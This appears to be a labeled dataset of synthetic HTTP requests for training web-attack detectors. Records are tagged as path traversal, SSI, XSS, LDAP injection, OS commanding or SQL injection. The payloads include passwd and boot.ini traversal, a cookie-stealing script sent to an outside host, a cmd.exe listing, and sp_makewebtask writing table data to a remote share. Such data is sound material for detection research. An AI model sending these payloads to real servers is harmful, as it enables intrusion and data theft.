If-Range: "vkwISyJp_eMW5fz5aE"
Max-Forwards: 4556
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic RUhsbTpmbGJE
Authorization: NTLM NHRhY2p1ZzdyZ2pldTJpbXRncm9mc2RkaXNyc2VvYXJ3QWNoYWVhcg==
Range: 3-6521,8-,9454-87196
Referer: /scaHh/tvpdt/8nrmad/nnf1sh1n.php
TE: trailers,trailers,deflate;q=0.5
Trailer: If-Unmodified-Since
User-Agent: edkaoyfkqr/9.3
UA-CPU: PowerPC
UA-Disp: 3828,378,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 8266x6680
Via: fulimp/9.8 47.115.6.229, 1.0 62.254.159.212, 0.9 41.20.31.187
Transfer-Encoding: compress
Upgrade: 9sh/5.0
Warning: 635 22.248.94.176 "ruzddvjemhiIjrwWr" 
X-Forwarded-For: 15.151.59.253
X-Serial-Number: 349968453574
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42927
Start - Id: 46313
class: PathTransversal
GET /n6c6OWfNP03brNavDf/f@K8UlO/iboo/dIqZKpgBfSNacii/tr8.shtml?vliumbntiagiee=owtj&services@lGYT4Y=rhyaoejep0Oe&rhaczue5nShsah=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&trupuaoshokg=%3B+bfq2ryzmetap HTTP/1.0
Host: www.5ohoascaMn.uk
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: eh-leeoIwa, atabw-szs7;q=0.1, 2rhtlci4-gEtaacrm, Spys-c
Cache-Control: no-store
Client-ip: 208.222.203.198
Cookie: SalhcLiesvrTc=075506;seihaabo=128;auteeaAusXnx=ey1Uqe8vqK
Cookie2: $Version="6"
Date: Sat, 17 Jun 06 20:33:13 CET
ETag: "-GzYbTKa0ciTQ3FJ"
Expect: 100-continue
From: twei@aedq.de
If-Modified-Since: Thu, 29 Apr 10 03:03:42 CET
If-Unmodified-Since: Thu, 08 Jan 04 12:37:16 GMT
If-Match: "Qwfa1QdWXZiU4g4U@M"
If-None-Match: *
If-Range: Mon, 11 May 09 16:02:32 CET
Max-Forwards: 67
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest response="c973fB96c44fD6a45864DFA7cb1fB18f"
Authorization: Digest nc=5F2E8d2F
Range: 426-9089,-721
Referer: /Gsei/ew8na.tar
TE: trailers
Trailer: Warning
User-Agent: Mozilla/6.4 (compatible; i4rrfcd; Unix; er9gm1eiyt; meih; tiHeigrtwr)
UA-CPU: Sparc
UA-Disp: 0145,4311,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 434x579
Via: 2.5 66.111.4.180, tIo/8.1 114.146.227.57:61
Transfer-Encoding: gzip
Upgrade: iNrqo/0.0, 3ii6c/7.6, pN6ieo/9.3, uda/6.3
Warning: 721 www.wehenl.jpeg "muIpoPasigatRbg" "Sun, 26 Jun 05 21:53:54 CET"
X-Forwarded-For: 189.150.137.247
X-Serial-Number: 4859376671430624
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46313
Start - Id: 39222
class: SSI
GET /lLkb8OSrms7jQudyBqa.tiff?ceIIT9ry=87947851&LFwcuP=xmltzei%3BpoaEdwindow.open&rtsulmovr3slnO=wP&IndT1.ogSk7=locationt7&ftjon5isema7sr=owe36&ni8ouoormspwIr=h%24rnlibe5c+x%5C%2Bvtrautoexecwinnt%26R&lehnexya5ir=%3C%21--%23email+fromhost%3D%22www.oESeqc.com%22+tohost%3D%22mailbox.nawt.com%22+message%3D%22wTtee+inaeeei+esiEkIsk+jcwe%22+fromaddress%3D%22hd1ep.com%22+toaddress%3D%22oAih.ohza.com%22+subject%3D%22awb%22+sender%3D%22qowr.com%22+replyto%3D%22ewezr.com%22+cc%3D%22rn1%22+inreplyto%3D%22avsiI+gHtR+leR5d%22+id%3D%22eoaasmail%22+--%3E&rn9esoe9=hd5t9yoirc HTTP/1.0
Host: www.2roaiahb.be:36
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic
Accept-Encoding: compress, identity;q=0.1, deflate
Accept-Language: hethc-ycodnr;q=0.9, qYee-r;q=0.0, 4s-nkhsieUd, 7tiTro-cW;q=0.5, teliNztm-Ej
Cache-Control: max-age=9484
Client-ip: 244.149.114.45
Cookie: ndabe=salris7y9odt8t;KYgSh-_=o iibpa;solgvoeehr=557698363;4.uBZCPE=:autoexeclsx8a[<t;@3Hl=ea%tetcbnyl3 e) 
Cookie2: $Version="748"
Date: Sat, 12 Jan 08 07:28:10 UTC
ETag: "8w56.kx88HfXvMi9e"
Expect: 100-continue
From: eobt@sitnTmdv.ch
If-Modified-Since: Sun, 01 Feb 04 16:38:40 GMT
If-Unmodified-Since: Thu, 14 Feb 08 09:27:58 CET
If-Match: "RXWDMLJIuxgW5c2pd"
If-None-Match: *
If-Range: Sat, 19 May 07 21:16:14 CET
Max-Forwards: 671
MIME-Version: 2.2
Pragma: no-cache
Authorization: tvfih toaier=t6einmm
Range: 5-9725,-6683
Referer: http://sEcnrh.gov/qites.cfm
TE: trailers,trailers
User-Agent: ategcsCte (h_dJ3Dcs5R; rlBbAIA; lALUeim)
UA-Disp: 4572,5584,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 506x400
Via: 5.2 www.ahamar.jpg
Transfer-Encoding: gzip
Upgrade: etvee/9.3, tcp7s/3.5, trta/7.7, hrfcrn/6.4
Warning: 129 126.9.12.10:16 "imhtyn" "Mon, 07 Dec 09 08:44:31 GMT"
X-Forwarded-For: 252.9.253.184
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39222
Start - Id: 48035
class: XSS
GET /pxebaltos3oHth2sh8oa/yX/enqdr/rltti88Tbyly/7lb5IjfIxBGf/hciay/FAqxp_lH0e7hYr./nlQgrac.gif?ryne2s7=90970302&itihssfdrgda4wo=%5B%5CxC0%5D%5B%5CxBC%5Dscript+%3E%5Balert+++%28%27onCf9%27%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript%3E&sdzmhl0ZchEtry=62729478 HTTP/1.0
Host: www.lEsgpcn.gov
Connection: marsmNdl
Accept: image/gif;q=0.5, application/*;q=0.6, image/*;q=0.5
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.3, deflate
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 195.17.8.114
Cookie: evasyeemoy=~at;mo4hqhbovea=tb;ge4izn=an9et;uxtsuEsro=tl;lunienir67=i;tmnecu=teOxIdassAoetrd
Cookie2: $Version="85"
Date: Sat, 27 Mar 04 13:01:04 CET
ETag: "RXIPZOoD.fV7rkbkIP4"
Expect: 100-continue
From: uesois@ewrsoxtt.it
If-Modified-Since: Fri, 24 Apr 09 20:38:20 CET
If-Unmodified-Since: Wed, 09 Jan 08 14:44:39 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 19 Apr 10 24:23:51 CET
Max-Forwards: 002
MIME-Version: 4.1
Pragma: crmrhia='dzNt'
Proxy-Authorization: Digest nc=DD143aEB
Authorization: NTLM aEQ2dDh0bm9hZDNNN2xzcnN5ZWhwbGRsYm90ZXRvaWpndHROSVlhdGluVGRy
Range: -605,08388-217,461352-2
Referer: /BdseP/hgysr/ue5fl/7dkaoa/utdv.ace
TE: gzip;q=0.3
Trailer: Accept-Charset
User-Agent: Mozilla/2.4 (X11; U; SunOS sun4u 8.9; ip-pd; rv:8.7.8) Gecko/77936732
UA-CPU: StrongARM
UA-Disp: 0372,351,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 717x263
Via: 1.7 71.35.142.28, 9tlea/8.8 www.fluilt.tiff
Transfer-Encoding: gzip
Upgrade: odv/3.8, cye8/8.2
Warning: 409 www.nwho7d.jpeg "t6otamehitht" "Sat, 04 Sep 04 24:22:06 CET"
X-Forwarded-For: 188.45.251.30
X-Serial-Number: 698729021
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48035
Start - Id: 37763
class: LdapInjection
GET /nBXlBIm_.7M0uAhZHtb/5Fx.cgi?eoutncntc=i7&nMSLoPeval=o9c-&cvFbodyPpescriptLZ-o=aliyq%29%28%26%28objectClass++%3D+++nM*%29&Grdvatfiejeo=fsdE%5C6Me7tate HTTP/1.1
Host: 77.204.219.178
Connection: close
Accept: */*
Accept-Charset: windows-1253;q=0.3, x-mac-arabic;q=0.4, koi8-r;q=0.6, hz-gb-2312, x-mac-greek
Accept-Encoding: 
Accept-Language: ttppk-nnnje;q=0.7, Mo-esqi5
Cache-Control: max-age=81
Client-ip: 28.9.182.133
Cookie: cttndu4os5oa=livar5tac;es=aztn;fsrYteTd=20434063
Cookie2: $Version="43"
Date: Wed, 10 Sep 08 23:53:39 UTC
ETag: "obHqz4OzX93Svrt6nEXA"
Expect: atsAq
From: fssGmo@tsxudTxl.fr
If-Modified-Since: Mon, 23 Mar 09 09:15:57 UTC
If-Unmodified-Since: Sat, 04 Sep 04 03:55:11 CET
If-Match: *
If-None-Match: "HAyqQsnnBVhH0bHT"
If-Range: Tue, 27 Jan 09 11:38:15 UTC
Max-Forwards: 3
MIME-Version: 6.5
Pragma: tqwAe=3ym5uotx
Proxy-Authorization: Basic MzRvbG86dGVzU3hhbmQ=
Authorization: Digest opaque="maud"
Range: 059-52057,02-0322
Referer: /s9rnjrm/hPnrcv/Ezttnu/tr3ht3s.msf
TE: deflate,trailers
Trailer: From
User-Agent: ezjxGjb5EY http://www.futon.biz
UA-CPU: x86
UA-Disp: 3833,663,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 807x162
Via: 7.0 www.ehInn.tiff:6058, xuee/8.0 www.adovz.jpg, 3.3 55.125.238.176
Transfer-Encoding: 5naO; rsx93jn=gmndN
Upgrade: si0/4.3, ewgHho/5.9, yibiRd/8.8, ahmafn/5.3
Warning: 397 www.estmthgu.jpeg "iqcdxmusey4i3" 
X-Forwarded-For: 195.192.117.214
X-Serial-Number: 7486160267274211008
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 37763
Start - Id: 40578
class: SSI
GET /n_uxLQM8soHTH/eGmyg11qeex0F3D5/eoknRkeaoieattot/nJNpBOs.4/sashrbcoeuatatQnn/NstmG/hpPldsnd.php?pfu9uf=ortoN3s1aMtlu&Eed=nndeoamvbscripth&r3dpsodalorst=%3C%21--+++%23include+++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++++--%3E&ueEntvm3e=e%24ftpae0script&rsat8e=Httlt3slbinatmpemes&8dteh1SkNb4=83&wu2script=pr6oexecarwolikeam%7E&fYS04YD0xXw=r1e8me&XqJEncwX=ir&mE-inputHboot.iniA8drfE=%26mten&ieLhimd=8 HTTP/1.1
Host: www.eilce9Rt.net:80
Connection: gEHo6
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.9, identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 18.199.244.27
Cookie: daAsdosh=o8QE97;smarrtzscc4rH=118570;chaoat5Xmqsd=2885145
Cookie2: $Version="656"
Date: Sat, 10 Oct 09 24:26:00 UTC
ETag: "cPzNsVV@J1oaXYX1tGy"
Expect: rentuei=eesik4r;tyjZRs
From: ciHn@mdreeh.gov
If-Modified-Since: Wed, 28 Feb 07 02:31:50 GMT
If-Unmodified-Since: Thu, 28 Feb 08 05:37:25 UTC
If-Match: *
If-None-Match: "9L.p7udFEVJES7DIDNK8"
If-Range: *
Max-Forwards: 11
MIME-Version: 9.1
Pragma: tE=ter
Proxy-Authorization: iseoyl snmerayt=A2dhraa
Authorization: Basic aDlaVG5qZ2Y6aTYwb250bg==
Range: -296381
Referer: http://erai.biz/isbeU/werh.dll
TE: trailers
Trailer: Date
User-Agent: guktsnstr
UA-CPU: PowerPC
UA-Disp: 563,477,16
UA-OS: Windows 98
UA-Pixels: 0455x286
Via: FTP/6.4 193.1.211.237:356
Transfer-Encoding: compress
Upgrade: nmoNa/7.1, shl/2.8, suah/2.9, drnip/9.7, aunle/8.8
Warning: 519 www.eejaeye.png "rslbjmqpxcnge" 
X-Forwarded-For: 218.205.84.216
X-Serial-Number: 69115
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 40578
Start - Id: 37239
class: LdapInjection
GET /5Aeh@/t9H5Xtj/hvZsx5eyW/olsihwqti1no3dcIaeos.htm?js9tb=rky6z2&Hlandprocessing-instructionI_YgHDE5=eq0djNtp3bodyea&MThomeu=06277&aafeigoihraaLR=97%29%28%26%28objectClass%3Dana%29%28%7C%28sn%3D+++fdaq%29%28cn%3Djti++++J*%29%29&btaEEecAO=244105&wcenMn=2399517&tMplolr=35&MVDinsertTlGservicesobjectdZN=h9hgmGPXe HTTP/1.1
Host: 155.198.0.34:6375
Connection: neixdis
Accept: */*;q=0.1
Accept-Charset: cp-950, iso-8859-8-i;q=0.7, cp-932;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: min-fresh=4928
Client-ip: 47.19.215.50
Cookie: 4so1nOUlrheo=3339337;rmtstd=3y1o;ErvttemeAnd0=tsglio;eUttnHrecqseeoe=d6NUt3lkDbRF
Cookie2: $Version="816"
Date: Tue, 24 Nov 09 11:32:09 UTC
ETag: "6rrN9a41Ue-7eg8e0W0"
Expect: nnsar
From: 87ho@Inuowxs.net
If-Modified-Since: Sat, 11 Oct 08 08:53:22 CET
If-Unmodified-Since: Tue, 21 Nov 06 04:11:53 CET
If-Match: "NL2X7@61VdelnlGgi"
If-None-Match: *
If-Range: Thu, 01 Jul 04 21:53:41 CET
Max-Forwards: 4444
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM b290WWNidHVyZWFtcG85c2hwZXNsZXJhZWV0bmVvMTlvdG4wc2l5ZGM5bGE=
Authorization: Htseo kOIv=thetog
Range: 38889-,402727-278555
Referer: /tvomoiea/oiayae5w.dll
TE: deflate
Trailer: Via
User-Agent: 6iae/5.2.4
UA-CPU: PowerPC
UA-Disp: 836,441,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 322x932
Via: 9.4 8.82.230.223, HTTP/8.6 184.73.164.59, saehx/6.9 196.2.63.78
Transfer-Encoding: weqp; e0tpea4=ettre
Upgrade: aybij/7.6, 6sthiq/6.8, nNx/6.1, wAen/2.4, 0taES/8.7
Warning: 519 www.ieWtti.tiff "seRierlduyai" 
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 9354462419781975
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37239
Start - Id: 46429
class: PathTransversal
GET /olyR_e/bJbIemv.N4L0SV/io/wiDEe-73s3MMNUeEG7j/ml3v9ktRiio.jpg?Atei3a=nbrieebKeluuethjm&p0bethai=raa1sdEa5hja2&lrnedo0tUsnl=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd&r3lseqjer=untIhe&kaKus=edeG%3Az4easelecttt-aiee1o&Pd@M_k=%40wlqnrrwtnwCSxp_rfwtdiv HTTP/1.0
Host: 96.113.114.0
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-cache
Cookie2: $Version="84"
If-Unmodified-Since: Wed, 14 Feb 07 11:12:33 CET
If-Range: Wed, 07 Nov 07 20:38:27 UTC
MIME-Version: 9.4
Referer: http://www.lfgegv.net/senl/rm5dc.asp
User-Agent: rleoti
UA-CPU: PowerPC
Via: 4.7 139.227.216.109, 6.6 57.47.31.223, HTTP/2.2 34.242.79.81:65513

null

End - Id: 46429
Start - Id: 36368
class: PathTransversal
GET /laaioktrraqacuoh/elPuniTXmb.jpeg?caym8pos=583923&5s4hmetSrtsx=yL9LEgVO0bhh&mnlsmUiMltsdy=29&E5d8aCs6gri=984476&o2nhe8aterna=805474&dgh=iUM&C5joDG83g0=47&aloiqQswbd=hKAu4o&ii5uruayr=253&ojuo5ropEtpSor=rrobsni&7nm0mh=r&hsolyaeepy4tas=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&0fOJAb@oU=rUbNNXayuj&R0HKnecho=lgoaccept HTTP/1.1
Host: 76.236.141.6:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: windows-1254, euc-cn, iso-8859-8, iso-8859-4;q=0.1
Accept-Language: sodenat-bpn74N;q=0.0, pqvjenh-aekh;q=0.7, Nteddr-el;q=0.8
Date: Thu, 29 Nov 07 14:24:20 GMT
ETag: W/"lfz1sREhUPfHBw1Fcu"
If-Unmodified-Since: Sun, 23 May 04 13:14:02 UTC
Max-Forwards: 151
MIME-Version: 7.0
Pragma: no-cache
Range: -31585,898409-624,686859-
Referer: http://www.adStoil4.it/e4eElsm.png
User-Agent: Mozilla/4.0 (Windows; U; Win98 6.6; el-wr; rv:8.7.4) Gecko/57832029
UA-Disp: 076,881,16

null

End - Id: 36368
Start - Id: 39226
class: SSI
GET /2si/apG2WcbyG/rNVb3ETPkUZ8YBI/6rtRS/kha/lxSzaZPBe/group byP9VcZomopenZbK./srpnemAeiotjosMt/nd44xt/s3TvbCPWtM/8kW7e_5ENDQ.msf?ure1mkwcr028nm=tnnanhsity&teojthe=%25u+&Drcolclw0hdiEA=SXmn88fttteti6e7&siTaCeRehll=includee&zfo3Lpceenn=lIB&U0uZ=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&loieccicafeaa7d=%3A&kcdEiw7dhkesln=s&lftuMz6Bh1uan3g=duqewr%3Ex%28 HTTP/1.0
Host: 194.43.240.202
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-5;q=0.8, koi8-r;q=0.7, iso-8859-3
Accept-Encoding: *
Accept-Language: tiuhj-Ae
Cache-Control: no-transform
Client-ip: 98.18.205.234
Cookie: cnta=m;sek=shIoa;tsNo=696943365;twttmtee5=oHe;1h7n=a~q
Cookie2: $Version="798"
Date: Sat, 11 Dec 04 14:14:49 CET
ETag: "U1BZQiwH_S_fQkFSh"
Expect: 100-continue
From: eobt@sitnTmdv.ch
If-Modified-Since: Sun, 29 Feb 04 24:32:37 CET
If-Unmodified-Since: Sun, 19 Feb 06 14:09:42 UTC
If-Match: *
If-None-Match: "t_MF_PcxP95bPWM_R"
If-Range: Sat, 12 Nov 05 07:27:47 UTC
Max-Forwards: 907
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM Z2VobFRlcnRhZTlvM2hnZG9udEZrZGxoZXp0cGFlaGlyc2ZlaGhlM2xpYnAzMg==
Range: 5-9725,-6683
Referer: http://sZerHiAf.biz/p9ncean.cgi
TE: gzip,trailers,trailers
Trailer: Pragma
User-Agent: uCstayDiq/0.6
UA-CPU: 68000
UA-Disp: 274,6270,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 506x400
Via: HTTP/2.0 122.86.230.116, tmYt/5.3 www.s30csrq.css:44
Transfer-Encoding: identity
Upgrade: sjrtoN/2.4, ytwq/5.4, RmLke/9.3, citRri/1.2
Warning: 129 126.9.12.10:16 "imhtyn" "Mon, 07 Dec 09 08:44:31 GMT"
X-Forwarded-For: 252.9.253.184
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39226
Start - Id: 47429
class: XSS
GET /adwtenec4riioed/urroiut1tsti/gstbi6esaen0e4ueo/iEhmfi5eotwn9o97ttfl/aInBdB1/hWVjRcG/tuowuionxvaf7ihole/o1eu7/RoTdiojecg.css?t6fmtsel9hnels=6796&pHTJKsUFaz9=%40t0ds&Bel=%3C%3Cscript+%3E%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.nede.com%2Fcgi-bin%2Flionil.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+++%3E&t5ngHEowsEavml=4sfTrAf68dxo&4nard9deabg=t&VWWe=9714779 HTTP/1.0
Host: www.m04n.cz:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-5;q=0.4, windows-874, windows-1258;q=0.8, us-ascii
Accept-Encoding: gzip, gzip;q=0.0
Accept-Language: ihec-eatl4h;q=0.8, fwE0e-laTbw, if-dx;q=0.2, a9al6yc-iih
Cache-Control: no-store
Client-ip: 225.48.136.105
Cookie: aife8ohhfc=50558
Cookie2: $Version="05"
Date: Thu, 25 Jan 07 13:55:34 GMT
ETag: "QkPnsGdJe177PaIh12u"
Expect: 100-continue
From: 0hOsn@ivHe.ch
If-Modified-Since: Sat, 07 Apr 07 17:33:18 GMT
If-Unmodified-Since: Sat, 09 Dec 06 24:36:53 GMT
If-Match: *
If-None-Match: "3eCfif6oUVuHRsE"
If-Range: Mon, 25 Jan 10 06:50:33 UTC
Max-Forwards: 970
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Basic ZVJkN2g6b2FsMw==
Authorization: Basic YXQ5c2VwdDpycWxkQXpJdA==
Range: 264348-7,043051-,50446-892
Referer: /epsexio/tehh/IcqeA.jsp
TE: deflate;q=0.2,chunked,trailers
Trailer: Referer
User-Agent: Mozilla/1.8 (Machintosh; U; PPC 0.8; Dt-sM; rv:3.8.2) Gecko/81062625
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1670x058
Via: 5.1 www.asey6o.jpeg, 8.0 www.Oantu.gif
Transfer-Encoding: gzip
Upgrade: 26e/0.8
Warning: 281 www.x8r0s.tiff "js1edtagecg" "Sat, 28 Jul 07 11:01:34 UTC"
X-Forwarded-For: 168.182.251.139
X-Serial-Number: 79894871032971877602
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47429
Start - Id: 45752
class: PathTransversal
GET /savr7r2peu7Eoni4D/etne/e0vaz_TPwW0Qysystem/aj/o-pznsc@dolV@hER/tcTzzq/lUycCwBMzQdE@BSvfh.aspx?riqls=iV-t&elrqef=n%3A%5Cwindows%5Cboot.ini&dtuiaw3szedei=ye6gL5o&oCwaEa2=r.U-ufu2w&xWeMaz0=qm&ei=4529&wLionamtpewi=st2tidehytrtbr&te=qulpeuZem&hiXE=teolwaiat&eododotk=ehgEfzy HTTP/1.0
Host: 162.158.170.214
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 235.152.227.70
Cookie: tfWrecg=59;nROtxwrsmsqae=tdL;oywl=Ota;dew=die+
Cookie2: $Version="51"
Date: Sat, 24 Apr 04 04:45:20 GMT
ETag: W/"XOfNqF66G.unu7sQ.q1p"
Expect: 100-continue
From: nbuYYe@rnspS.ch
If-Modified-Since: Mon, 07 Aug 06 04:21:49 CET
If-Unmodified-Since: Tue, 31 Oct 06 13:57:04 GMT
If-Match: *
If-None-Match: "T@Y6o5kDzgA1A_hcbZ.h"
If-Range: *
Max-Forwards: 189
MIME-Version: 7.5
Pragma: s=lnv
Proxy-Authorization: Digest uri=/beS0.doc
Authorization: Digest response="094fe2ECEd1ec8875845BBFbA6Aae73d"
Range: -500252,934-3694
Referer: /tncrm8e6.gif
TE: chunked
Trailer: Range
User-Agent: rreroi/6.4
UA-CPU: StrongARM
UA-Disp: 0244,7553,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 337x559
Via: saehs/0.0 www.fcaW2ptt.shtml:909
Transfer-Encoding: 3Epmo
Upgrade: aGdne/3.3, slrmIL/7.0, hsea/2.9, wrhit/9.0
Warning: 138 195.65.50.48 "amRyeeev4t" 
X-Forwarded-For: 156.175.229.133
X-Serial-Number: 82558
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45752
Start - Id: 45266
class: PathTransversal
GET /./? HTTP/1.0
Host: www.soomeiiiwa.ch
Connection: keep-alive
Accept: application/postscript;q=0.6, video/mpeg
Accept-Charset: x-mac-ce, macintosh;q=0.6, windows-1258, iso-8859-9, cp-932
Accept-Encoding: deflate;q=0.9, identity;q=0.8, identity;q=0.0
Accept-Language: *
Cache-Control: no-transform
Cookie2: $Version="2"
Date: Mon, 18 May 09 10:37:57 UTC
ETag: W/"kNV0ICg6OLH5qsWqn."
If-Modified-Since: Tue, 07 Nov 06 11:17:05 CET
If-Unmodified-Since: Fri, 24 Oct 08 14:01:02 UTC
Pragma: no-cache
Authorization: Digest realm
Referer: /oePrda/da8nejd/lIMj/raEna.swf
Trailer: Pragma
User-Agent: Mozilla/9.2 (compatible; Konqueror/5.7; Open BSD i386; IalJnscy; 94aeemus4E)
Via: 5.1 219.188.36.102, ncoyo/7.7 43.82.112.112
Upgrade: e1n1dh/0.4, eylAt/1.8, e5a/3.9, tlo9ar/7.4, yhbenu/9.1
Warning: 594 www.0mednni.jpg "tgekTenolebhEhler" "Fri, 30 Jul 04 21:29:55 UTC"
----: --------------------------------------------------

null

End - Id: 45266
Start - Id: 44062
class: OsCommanding
GET ..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.wnznnhmhon.fr
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 185.93.146.213
Cookie: ahht=1203706;a4iEWge5=rz;wCA=eiud5
Cookie2: $Version="43"
Date: Sat, 14 Feb 04 13:33:06 GMT
ETag: W/"E39zcJPTTKayK1bm@"
Expect: 100-continue
From: ctHO@rsrvtl.cz
If-Modified-Since: Wed, 11 Oct 06 11:18:01 UTC
If-Unmodified-Since: Sun, 11 Jan 04 07:13:57 UTC
If-Match: "UPwvHzNH49-3_djtCxyb"
If-None-Match: "_fd0fyKesV3Tnmi"
If-Range: "XIdU6YFkNmv.RQLm9@"
Max-Forwards: 5589
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM dDF0aE5xMXl5dGV0bng5c2wycmFvdGlhYWF3cjZSbWtubXV0bQ==
Authorization: Digest nonce
Range: -4867,66-33,-6
Referer: http://qLefol.biz/eedzeOs.mpeg
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: hAs2S53m2fvtfthidcia
UA-CPU: PowerPC
UA-Disp: 6409,6413,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4959x090
Via: 8.6 www.cbtGUa.shtml
Transfer-Encoding: compress
Upgrade: Rjwza/4.8, tein/1.3, crss4/4.1
Warning: 175 26.216.110.35 "tt5rn4Ks" "Fri, 26 May 06 17:19:02 GMT"
X-Forwarded-For: 33.218.49.141
X-Serial-Number: 412280187
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44062
Start - Id: 35032
class: SqlInjection
PUT /4sENknmzntnsm/l@x1S.rRVktkErg@/oMXaPwlc2a/tAzJIUQDY9K0hc.js? HTTP/1.1
Content-Length: 234
Content-Language: 3pcsnkgs
Content-Encoding: identity
Content-Location: /endeuhs/apsrmse/bdnk/ehaTanr/lbndaa.txt
Content-MD5: YXBSeW15cjJhc25jdHdpcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Feb 10 01:32:26 CET
Last-Modified: Tue, 15 Dec 09 04:08:22 CET
Host: www.eeiylgubi.com
Connection: close
Accept: */*;q=0.0
Accept-Charset: euc-kr;q=0.2, gb2312;q=0.8, us-ascii, windows-1255, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: ti-s, es-sorie;q=0.4, ro4-Lkfltio1, e4tex5d-E, oae-zna2eunj
Cache-Control: 6i2=0enerLn
Client-ip: 194.197.22.178
Date: Wed, 07 Sep 05 03:01:40 CET
ETag: "KS65qG-WKNityL8JU"
If-Modified-Since: Sun, 21 Nov 04 23:45:06 GMT
If-Unmodified-Since: Fri, 14 Mar 08 23:25:14 UTC
If-Match: "mFQjyD86fLq3JNF8J"
If-None-Match: *
If-Range: "lGTO.4Y0@PpUcnFk1VI"
Max-Forwards: 0916
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic bWR0cmxSeTpydUN0ZXRlcg==
Authorization: rxeiwt mmee=mSaioiaf
Referer: http://www.n92NpE.com/hhhgatu/enict/Zwchniid/gTjiosro.ace
User-Agent: tnwnygw
UA-CPU: 68000
----: --------------------

andisc7n=5167472&9qiiognnlcEiau=41854&ayusudbolwiyN='; EXEC   master..sp_makewebtask "\\207.93.211.135\1Eosr\lly.tiff",     "SELECT    *   FROM INFORMATION_SCHEMA.TABLES"&v4vT.=arh5etV84olB82lc&Ain= l&ylQI6N_=mw_

End - Id: 35032
Start - Id: 38350
class: LdapInjection
